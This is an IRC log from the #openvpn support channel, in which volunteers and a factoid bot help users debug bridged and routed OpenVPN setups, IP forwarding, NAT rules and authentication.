[~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 00:38 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 00:42 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has joined #openvpn 00:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 00:44 < stan_man_can> Are there any really simple openvpn guides available for setting up a server on linux? I just want something to run on my VPS so I can view US sites 00:45 < pekster> !howto 00:45 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 00:46 < pekster> Start with the official howto, then once you have basic connectivity up, either redirect all your traffic across the VPN, or use a proxy across the VPN tunnel and point your browser to the proxy 00:46 < pekster> For redirecting traffic, first get a working VPN tunnel, then follow this: 00:46 < pekster> !redirect 00:46 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 00:46 <@vpnHelper> http://ircpimps.org/redirect.png 00:48 < stan_man_can> Is it a pain to setup? My server admin skills leave much to be desired, I was hoping somewhere, someone would have put together a walk through 00:50 < stan_man_can> pekster: is openvpn access server a more brain dead approach? 00:50 < pekster> The howto is effective a walkthrough to basic VPN connectivity 00:52 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 00:53 < pekster> I can't speak to Access Server; that's the commercial side, and I strictly deal with the GPL open-source software. If you wish to use a non-open commercial product, you're of course free to look into it 00:53 < stan_man_can> fair enough 00:54 < stan_man_can> I remember setting up openvpn a few years back and getting it to work, but now it's getting the best of me 01:09 -!- ade_b [~Ade@koln-5d8146d4.pool.mediaWays.net] has joined #openvpn 01:09 -!- ade_b [~Ade@koln-5d8146d4.pool.mediaWays.net] has quit [Changing host] 01:09 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 01:15 -!- Nemus [~Nemus@unaffiliated/nemus] has joined #openvpn 01:16 < Nemus> so I have a connection setup to do bridge it connects successful but I cannot connect to the remote network 01:18 < pekster> Nemus: first off, why are you bridging? Normally you want to use a routed/tun setup unless you need tap specifically (see output from the bot momentarily.) Regardless, configs/logs would help 01:18 < pekster> !tunortap 01:18 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 01:18 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 01:19 < Nemus> I have setup several sucessful routed version of openvpn but wanted to learn how to seutp a bridge vpn to use for lan gaming 01:19 < pekster> Ah, sure 01:20 < pekster> tap isn't wrong, but sadly many people use it mistakenly thinking it's "easier." Are you trying to bridge to a physical network, or just have a completely virtual tap-based LAN? 01:20 < Nemus> I am trying to connect ot a physical network from a remote computer. 01:21 < Nemus> http://pastebin.com/5LU8xmcS 01:22 < Nemus> is my bridge setup on the physical server connected to the pythincal lan 01:24 -!- Teck7__ [~teck7@bas1-montreal54-1279375478.dsl.bell.ca] has joined #openvpn 01:24 < Nemus> http://pastebin.com/af9Drk0D 01:24 < Nemus> more info 01:25 < pekster> Can you paste the server config (comments stripped please) and interface info via 'ip addr' ? 01:25 < Nemus> yep 01:26 -!- Teck7 [~teck7@76.65.61.190] has quit [Ping timeout: 245 seconds] 01:28 < pekster> There's some useful sed magic to strip comments: 01:28 < pekster> !configs 01:28 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 01:31 < Nemus> oh thank you 01:32 < stan_man_can> !def1 01:32 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 01:33 < Nemus> http://pastebin.com/zDMVZNg6 01:34 < Nemus> that should have everything 01:34 < pekster> Yea. This works, but in the future: 01:34 < pekster> !ifconfig-linux 01:34 <@vpnHelper> "ifconfig-linux" is Avoid use of 'ifconfig' and 'route' commands on modern Linux distros. It's old, deprecated, and often misleading/wrong. Use the 'ip a' and 'ip r' commands instead. More info: http://inai.de/2008/0219-ifconfig-sucks.php 01:35 < pekster> So, tap0 is not in the br0 bridge 01:35 < Nemus> http://pastebin.com/vxLk3nGK 01:35 < Nemus> sorry brctl show was missing tap0 in the bridge on the pastebin 01:36 < Nemus> it is just got cut off in the paste 01:37 < Nemus> its been boggling my mind 01:37 < pekster> Then it looks okay. Can you ping 10.1.10.2 after you connect? 01:37 < Nemus> I even have selinux off 01:37 < Nemus> nope 01:37 < stan_man_can> !pushdns 01:37 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 01:37 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 01:40 < pekster> Logs would be the next step. Generally anything above verb 5 is for debug purposes, and at verb 5 you get rRwW printed in the logs for tunneled/encapsulated packets read/write 01:40 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has quit [Quit: stan_man_can] 01:40 < pekster> !logs 01:40 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 01:40 < Nemus> http://pastebin.com/bqkgiJsX attached is all i see from openvpn 01:41 < pekster> That's missing all the interesting bits about the connect. Drop to 'verb 4' and you'll get more sane looking logs from the connection 01:47 < Nemus> http://pastebin.com/VsXzcAyB 01:48 < Nemus> I think something is blocking it 01:50 < pekster> And the client logs? 01:51 < pekster> The connect sequence looks fine from the server's view 01:51 < Nemus> do you want the client config also? 01:52 < pekster> Depends on what I see in the log :P 01:59 < Nemus> http://pastebin.com/rPFui3xm 02:01 < Nemus> http://pastebin.com/qPZ9cUK6 02:01 < Nemus> with client config 02:02 < pekster> Odd indeed. Next step would be to tcpdump pakcets and see why you don't get a ping reply from 10.1.10.2 from 10.1.10.200 02:02 < Nemus> would it be anything if sysctl? 02:03 < Nemus> with* 02:05 < pekster> Shouldn't be, unless you've gone messingn with some obscure settings (things like misconfiguring arp_ignore would be Bad, but you have to try to break something like that) 02:05 < Nemus> well I am off to bed thank you so much for you help 02:05 < Nemus> still not quite sure why it isn't working 02:05 < pekster> Yea. I'd see where you loose the ping 02:06 < Nemus> on tcpdump i see the arp quest at the host 02:06 < Nemus> but not at the server 02:06 < Nemus> I see the openvpn packets come in 02:06 < Nemus> but after that its nothing 02:06 < Nemus> very odd 02:06 < pekster> So you se the udp port 969 stuff, but not the encapsulated ARP request on br0? 02:07 < Nemus> yep 02:08 < pekster> Oh, I just noticed in your log from earlier it said device tap1 opened 02:08 < pekster> Not ta0 02:08 < pekster> tap0* 02:09 < pekster> If you've created tap0 outside openpvn, you need to explicitly tell it to use that device 02:09 < pekster> Otherwise, if you'd like to let openvpn dynamically create one for you you'll need a script to add it to your bridge when it comes up 02:09 < Nemus> http://pastebin.com/hXjd2irW 02:10 < Nemus> hmm I only ever see tap1 in the ip a info 02:11 < pekster> Did I mention yet how ifconfig sucks? :) 02:11 < Nemus> lol you did 02:11 < pekster> It's in your server logs as tap1 when openvp starts up 02:11 < pekster> openvpn* 02:11 < pekster> Line 146 in that latest paste 02:11 < pekster> That's of course a prolem 02:12 < pekster> Use --dev tap0 explicitly in your config, or dynamically manage the port addition of the device to the bridge on startup 02:12 < Nemus> okay sweet 02:12 < Nemus> thank you so much 02:13 < Nemus> so when are start the server i put --dev tap0 02:14 < pekster> In your config files works too 02:14 < pekster> !-- 02:14 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file. 02:14 < pekster> The issue is that openvpn sees tap0 and since you didn't tell it to use it (you must have created this before you started openvpn?) it dynamically creates another device it calls tap1 02:15 < pekster> tap1 isn't part of your bridge, thus it is a floating island by itself and traffic never goes anywhere, just like a PC connected to a switch by itself 02:17 < Nemus> makes sense 02:17 < Nemus> and now its working! 02:17 < Nemus> thank you so much for your help 02:18 < Nemus> pekster your the best! 02:18 < pekster> No problem. Thank me by avoiding use of ifconfig in the future ;) 02:18 < Nemus> will do 02:18 < pekster> (NB: ifconfig -a would have shown you tap1. It's still an awful tool when used under Linux.) 02:25 -!- joako [~joako@opensuse/member/joak0] has quit [Ping timeout: 260 seconds] 02:30 -!- master_of_master [~master_of@p4FF24408.dip.t-dialin.net] has joined #openvpn 02:33 -!- master_o1_master [~master_of@p4FF244AC.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 02:45 < jzaw> pekster ... is there something in sever.conf that i could have removed that stops the route for the ipv4 ip of the ovpn server being added once tap0 is up 02:45 < jzaw> im having to add it manually 02:45 < jzaw> im sure it used to be added automatically ... but i touched the conf ;) 02:47 < jzaw> ahh is that the differencde between local + server vs server-bridge ? 02:48 < jzaw> server-bridge adds that extra route for to always go to the server via internet ! vpn 02:50 -!- jgeboski- [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 03:01 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 03:12 -!- jgeboski- is now known as jgeboski 03:18 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 03:33 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 03:42 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 03:46 -!- [fred] [fred@konfuzi.us] has joined #openvpn 03:52 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 04:03 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 264 seconds] 04:04 -!- Thermi_ [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 04:07 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 04:12 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 04:13 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 04:23 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 260 seconds] 04:34 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 04:41 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 04:43 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Operation timed out] 04:43 -!- master_o1_master [~master_of@p4FF247E1.dip.t-dialin.net] has joined #openvpn 04:44 -!- master_of_master [~master_of@p4FF24408.dip.t-dialin.net] has quit [Read error: Operation timed out] 04:46 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 04:47 -!- novaflash is now known as novaflash_away 04:47 -!- novaflash_away is now known as novaflash 04:47 -!- Wintereise [~reise@205.185.126.190] has joined #openvpn 04:47 -!- Wintereise [~reise@205.185.126.190] has quit [Changing host] 04:47 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 04:57 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Quit: Herpa la Derpa] 04:59 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 05:01 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 05:06 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 05:25 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 05:29 -!- dazo_afk is now known as dazo 05:39 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 05:40 -!- master_of_master [~master_of@p4FF24517.dip.t-dialin.net] has joined #openvpn 05:43 -!- master_o1_master [~master_of@p4FF247E1.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 05:59 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 248 seconds] 06:05 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 06:19 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 06:22 -!- zz_AsadH [~AsadH@irc.unixio.com] has joined #openvpn 06:22 -!- zz_AsadH is now known as AsadH 06:22 -!- AsadH [~AsadH@irc.unixio.com] has quit [Changing host] 06:22 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 06:34 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 06:38 -!- Starscreamer [~starscrea@217.41.69.72] has joined #openvpn 06:39 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 06:47 -!- kubbing [~kubbing@gprs11.vodafone.cz] has joined #openvpn 06:52 -!- Starscreamer [~starscrea@217.41.69.72] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 06:52 -!- kubbing [~kubbing@gprs11.vodafone.cz] has quit [Remote host closed the connection] 06:59 -!- Starscreamer [~starscrea@host217-41-69-72.in-addr.btopenworld.com] has joined #openvpn 07:06 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 07:10 -!- Starscreamer [~starscrea@host217-41-69-72.in-addr.btopenworld.com] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 07:19 -!- gardar [~gardar@gardar.net] has quit [Quit: bye!] 07:19 -!- gardar [~gardar@gardar.net] has joined #openvpn 07:22 -!- rkantos [robin@109.169.7.197] has quit [Ping timeout: 260 seconds] 07:22 -!- rkantos [robin@4e.fi] has joined #openvpn 07:23 -!- Starscreamer [~starscrea@host217-41-69-72.in-addr.btopenworld.com] has joined #openvpn 07:33 -!- Starscreamer [~starscrea@host217-41-69-72.in-addr.btopenworld.com] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 07:45 -!- cpm [~Chip@pdpc/supporter/active/cpm] has joined #openvpn 07:50 -!- cpm [~Chip@pdpc/supporter/active/cpm] has left #openvpn [] 07:52 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 08:18 -!- Teck7__ [~teck7@bas1-montreal54-1279375478.dsl.bell.ca] has quit [Quit: Leaving] 08:20 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 08:40 -!- rufianw [~ntrrgc@79.109.52.159.dyn.user.ono.com] has joined #openvpn 08:40 < rufianw> !welcome 08:40 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 08:40 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 08:41 < rufianw> !howto 08:41 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 08:45 < rufianw> I am trying to make my virtual network (which is physically on my laptop) reachable from other hosts from the same network. I have a virtual machine with routing, DHCP and DNS, which serves the rest of virtual machines as gateway. 08:47 < rufianw> To start with the VPN setup, I created a new virtual machine with bridged interfaces (so it's like a computer on the same network as my laptop, but it isn't inside the virtual network), and now I am trying to do first VPN connectivity checks. 08:47 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 08:48 < rufianw> I tried the example 1 here. http://openvpn.net/index.php/open-source/documentation/manuals/65-openvpn-20x-manpage.html#lbAV 08:48 <@vpnHelper> Title: OpenVPN 2.0.x (at openvpn.net) 08:49 < rufianw> And the issue currently is I am getting warnings like this: 'ifconfig' is used inconsistently, local='ifconfig 10.4.0.1 10.4.0.2', remote='ifconfig 10.4.0.2 10.4.0.1' 08:50 < rufianw> I can't understand why those warnings emerge. 08:50 < rufianw> Also, VPN is not working. 08:50 < rufianw> Any help? 08:51 < rufianw> I should note the VPN server is NATted, but the port is open. 08:56 < rufianw> Oh. This is strange. If I init the server, but not the client, the warning appears anyway. 08:56 < rufianw> It seems like if it is trying to connect to itself. 09:00 -!- Denial [~Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 09:05 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:06 -!- HyperGlide [~HyperGlid@221.237.121.63] has joined #openvpn 09:13 < rufianw> Hmm... edited the NAT port forwarding settings, and I got rid of the warning... but it is still not working. 09:13 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has joined #openvpn 09:14 < rufianw> Packets are send from client to server, and server logs "Peer Connection Initiated" and "Initialization Sequence Completed", but it does not send packets through the wire. 09:15 < stan_man_can> 1ipforward 09:16 < stan_man_can> !ipforward 09:16 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 09:16 -!- HyperGlide [~HyperGlid@221.237.121.63] has quit [Read error: Connection reset by peer] 09:16 < stan_man_can> !osxipforward 09:16 <@vpnHelper> "osxipforward" is (#1) sysctl -w net.inet.ip.forwarding=1 for a temp solution or (#2) add IPFORWARDING=-YES- in /etc/hostconfig for a permanent solution 09:16 -!- HyperGlide [~HyperGlid@221.237.121.63] has joined #openvpn 09:17 < TheWarden> why is it a good idea to reduce OpenVPN daemon's privileges to user nobody group nogroup ? 09:18 < stan_man_can> is that IPFORWARDING in the hosts file supposed to go on my OSX or the openvpn server? 09:21 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 09:21 < stan_man_can> 1nat 09:21 < stan_man_can> !nat 09:21 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 09:22 < stan_man_can> !linnat 09:22 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 09:23 < rob0> Stan, /etc/hostconfig is not an openvpn file, and "IPFORWARDING" is not an openvpn directive. 09:23 < stan_man_can> : "osxipforward" is (#1) sysctl -w net.inet.ip.forwarding=1 for a temp solution or (#2) add IPFORWARDING=-YES- in /etc/hostconfig for a permanent solution 09:23 < rob0> rufianw, I did not see your pastebin anywhere. 09:24 < stan_man_can> rob0 ^ 09:24 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Excess Flood] 09:24 < rob0> TheWarden, as with all Unix daemons, the idea of privilege reduction is to reduce the potential risk of a successful exploit. 09:25 < rob0> (an attacker might gain the ability to run undesired code, but not run it as root.) 09:26 < rob0> 14:18 < stan_man_can> is that IPFORWARDING in the hosts file supposed to go on my OSX or the openvpn server? 09:26 < dioz> i don't always PC 09:26 < dioz> but when i do i use root 09:26 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has joined #openvpn 09:26 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host] 09:26 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 09:27 < stan_man_can> rob0: so then it goes on my client? 09:27 < rob0> You're overestimating my magical abilities. 09:29 < rufianw> I got it to connect... on TCP. 09:29 < stan_man_can> i'm just trying to get it working so I can use my openvpn server as a proxy server so I can have a US ip 09:29 < stan_man_can> i can connect to the openvpn server just fine, but haven't got the ipforwarding part owrking 09:29 < stan_man_can> i did !def1 09:29 < stan_man_can> !def1 09:29 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 09:30 < rob0> !redirect 4 09:30 < rob0> !redirect 3 09:30 < rob0> !redirect 09:30 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 09:30 <@vpnHelper> http://ircpimps.org/redirect.png 09:30 < rob0> #4, flowchart 09:31 < rufianw> Ok, it works only in TCP. I don't mind really. Is there any reason to use UDP? 09:32 < rob0> !tcp 09:32 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 09:32 < stan_man_can> !def1 09:32 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 09:32 < rufianw> :\ 09:33 < stan_man_can> wait, does the pursh redirect-gatway go on the client or server? 09:34 < rob0> --push is to set client directives server-side. 09:36 -!- _quadDam1ge is now known as _quadDamage 09:37 < stan_man_can> whenever I add the push "dhcp-option DNS 10.8.0.1" directive my connection to the openvpn server continually connects 09:38 < rufianw> Well, it seems it won't work with UDP, so I'll carry on with TCP. 09:39 < rufianw> Next step: Can I set up a bridged VPN without auth nor encryption? 09:40 -!- stan_man_can [~stan_man_@d75-155-220-99.bchsia.telus.net] has quit [Quit: stan_man_can] 09:45 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn 09:50 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Read error: Connection reset by peer] 09:50 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn 09:52 < TheWarden> rob0: oh okay mmmm 09:52 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 09:53 -!- HyperGlide [~HyperGlid@221.237.121.63] has quit [Remote host closed the connection] 09:58 < TheWarden> In order to use the openvpn-plugin-auth-pam one must have auth-user-pass-verify and plugin /usr/lib/openvpn/plugins/openvpn-plugin-auth-pam.so service-type and plugin /usr/lib/openvpn/plugins/openvpn-plugin-auth-pam.so "login login USERNAME password PASSWORD" ? 10:06 < rufianw> Hmm... I managed modifying the test connection script to do it, but it only allows one client. 10:08 -!- kubbing_ [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has joined #openvpn 10:08 -!- kubbing [~kubbing@ip-89-176-96-114.net.upcbroadband.cz] has quit [Read error: Connection reset by peer] 10:08 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 10:08 -!- mode/#openvpn [+o mattock] by ChanServ 10:08 < TheWarden> there must be some instructions some where on how to achieve this OpenVPN PAM authentication to active directory. I don't even know if I have things setup properly to even achieve this. 10:09 < TheWarden> I've been following this as this has been the only resource I've found that some what explains the situation yet some how I don't think it has everything in order for it to work. 10:10 < rufianw> This is the output of the client: http://dpaste.de/ftqkO/ 10:10 < rufianw> The server does not show anything special. Not even it received a new connection. 10:11 < TheWarden> so frustrating.... there has to be someone out there that has done this. 10:13 < TheWarden> I wonder would this even apply to OpenVPN 2.3.0. https://www.packtpub.com/openvpn-2-cookbook/book ? I believe the book was written for OpenVPN v2.2.0.... 10:13 <@vpnHelper> Title: OpenVPN 2 Cookbook | Packt Publishing (at www.packtpub.com) 10:13 < rufianw> "OpenVPN as a , forking TCP server which can service multiple clients over a single TCP port?" <<< this is in tha FAQ. I'll check it... 10:14 -!- pulz [geir@winning.no] has quit [Read error: Operation timed out] 10:14 -!- pulz [geir@winning.no] has joined #openvpn 10:20 -!- raidz_away is now known as raidz 10:23 < TheWarden> argh so can someone tell me this, does one use PAM plugin as a replacement for auth-user-pass-verify or does one need to use the PAM plugin and the auth-user-pass-verify? 10:27 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 10:30 < rufianw> "--inetd nowait can only be used in TLS mode" <<< why? 10:41 -!- DBordello [~DBordello@unaffiliated/dbordello] has left #openvpn ["Leaving"] 10:50 < rufianw> "--mode server requires --tls-server" <<< is it me, or OpenVPN won't let me do almost anything "insecurely"? 10:50 < rufianw> I do not want to create keys and give each user a key. 10:59 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 252 seconds] 11:00 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has joined #openvpn 11:04 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 11:20 -!- speed_racer8 [~speed_rac@c-76-30-144-32.hsd1.tx.comcast.net] has quit [Ping timeout: 246 seconds] 11:21 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 11:34 < jzaw> yea! \0/ its working 11:37 < jzaw> pastebin say ive reached my 25 unlisted pastes 11:37 < jzaw> upgrade now $2 a month 11:37 < jzaw> whats a good free paste type site? 11:37 < jzaw> oops sorry wrong channel 11:37 < hazardous> zerobin 11:37 < hazardous> sebsauvage.net/paste/ 11:38 < jzaw> or not as the case may be ... turns out to be the right channel 11:38 < jzaw> :D 11:38 < jzaw> thanks 11:38 * jzaw very pleased with new vpn 11:38 * hazardous very pleased with novaflash 11:38 * novaflash very hazardous with hazard's ass 11:38 < jzaw> but if you do use m0n0wall or openwrt ... pls get yourself a big 2x4 to bash them with 11:39 <@novaflash> jzaw: what's with monowall..? 11:39 < jzaw> similar to openwrt 11:39 <@ecrist> jzaw: stop posting unlisted pastes 11:39 < jzaw> firewall router s/w 11:39 < jzaw> ecrist, i could do that 11:39 <@ecrist> seems easy enough to me 11:39 <@ecrist> !topsecret 11:39 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust. 11:39 < jzaw> but id be embarrased if ppls saw some of my errors in scripts etc 11:40 <@ecrist> get over it 11:40 <@ecrist> :) 11:40 < jzaw> true true 11:40 <@ecrist> OR pay the $2 11:40 <@novaflash> yes we prefer to see people embarrassed 11:40 * jzaw blushes 11:43 < jzaw> novaflash, ah i just re-read your question .... m0n0wall ... running a ovpn server on a box behind m0n0wall ... you set a static route back to the server .... allow traffic on the lan port 11:43 < jzaw> but no go 11:44 < jzaw> i didnt read too much deeper after i found the right setting ... something to do with icmp-redrect (or maybe not but googling that topic found the answer) t 11:44 < jzaw> theres a setting 11:44 < jzaw> ... 11:44 < jzaw> http://photos.dzki.co.uk/m0n0wall_adv_setting_bypass_fw_same_interface.png 11:44 -!- eggy [uid554@gateway/web/irccloud.com/x-parhtlctkgnhjhaw] has joined #openvpn 11:44 < jzaw> you have to tick that .. then it works 11:45 < jzaw> with openwrt the usual iptables FORWARD tap br-lan and br-lan tap and tap tap 11:47 < eggy> so.. I have openvpn setup on a separate 192.168.7.0/255.255.255.0 subnet; my lan is on 192.168.1.0/255.255.255.0 subnet.. how do I set it up so my vpn clients have access to this subnet? Would I need to setup a bridge? 11:49 < jzaw> eggy .... (im new to the whole vpn thing ) but ive found bridge vvvvvvv hard to get right and ive not had it going at all 11:49 < jzaw> i got routed tun working first 11:49 < jzaw> then just tried routed tap 11:50 < eggy> I've got my openvpn subnet working fine, haven't figured out how to introduce the secondary subnet. 11:50 < jzaw> is your vpn routed ? tap ? tun? 11:51 < eggy> tun, using the subnet type setting. openvpn seems to figure out the reset for me. 11:52 < eggy> reading a guide, I might be able to accomplish what I want using iptables actually. 11:54 < jzaw> wouldnt it just be routing? 11:58 -!- rufianw 